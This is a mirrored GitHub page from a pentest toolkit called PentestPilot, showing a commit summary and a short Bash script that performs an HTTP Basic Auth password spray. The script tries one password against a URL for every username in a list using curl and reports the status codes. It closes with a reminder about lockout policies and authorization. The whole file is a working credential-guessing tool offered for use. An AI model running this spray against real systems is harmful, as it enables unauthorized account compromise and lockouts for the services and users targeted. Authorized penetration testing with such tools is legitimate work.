mirror of
https://github.com/0xMarcio/PentestPilot.git
synced 2026-02-13 05:22:54 +00:00
Initial commit of PentestPilot — AI‑assisted pentest recon and orchestration toolkit.\n\nHighlights:\n- Resumeable pipelines (full_pipeline) with manifest state and elapsed timings\n- Rich dashboard (colors, severity bars, durations, compact/json modes)\n- Web helpers: httpx→nuclei auto, tech routing + quick scanners\n- Agents: multi‑task orchestrator (web/full/ad/notes/post) with resume\n- AD/SMB, password utils, shells, transfer, privesc, tunnels\n- QoL scripts: proxy toggle, cleanup, tmux init, URL extractor\n- Docs: README (Quick Start + Docs Index), HOWTO (deep guide), TOOLKIT (catalog with examples)\n\nStructure:\n- bin/automation: pipelines, dashboard, manifest, resume, tech_actions\n- bin/web: routing, scanners, helpers\n- bin/ai: orchestrators + robust AI utils\n- bin/ad, bin/passwords, bin/shells, bin/transfer, bin/privesc, bin/misc, bin/dns, bin/scan, bin/windows, bin/hashes\n- HOWTO.md and TOOLKIT.md cross‑linked with examples\n\nUse:\n- settarget <target>; agent full <domain|hosts.txt>; dashboard --compact\n- See HOWTO.md for setup, semantics, and examples.
26 lines
536 B
Bash
Executable File
26 lines
536 B
Bash
Executable File
#!/usr/bin/env bash
|
|
set -euo pipefail
|
|
|
|
usage(){
|
|
cat >&2 <<USAGE
|
|
Usage: $(basename "$0") <url> <users.txt> <password>
|
|
Performs cautious HTTP Basic Auth spray (one pass).
|
|
USAGE
|
|
exit 1
|
|
}
|
|
|
|
url=${1:-}
|
|
users=${2:-}
|
|
pass=${3:-}
|
|
[[ -z "$url" || -z "$users" || -z "$pass" ]] && usage
|
|
|
|
while IFS= read -r u; do
|
|
[[ -z "$u" ]] && continue
|
|
code=$(curl -sk -o /dev/null -m 6 -w "%{http_code}" -u "$u:$pass" "$url" || true)
|
|
echo "$u\t$code"
|
|
sleep 1
|
|
done < "$users"
|
|
|
|
echo "[+] Note: Respect lockout policies. Use only with authorization."
|
|
|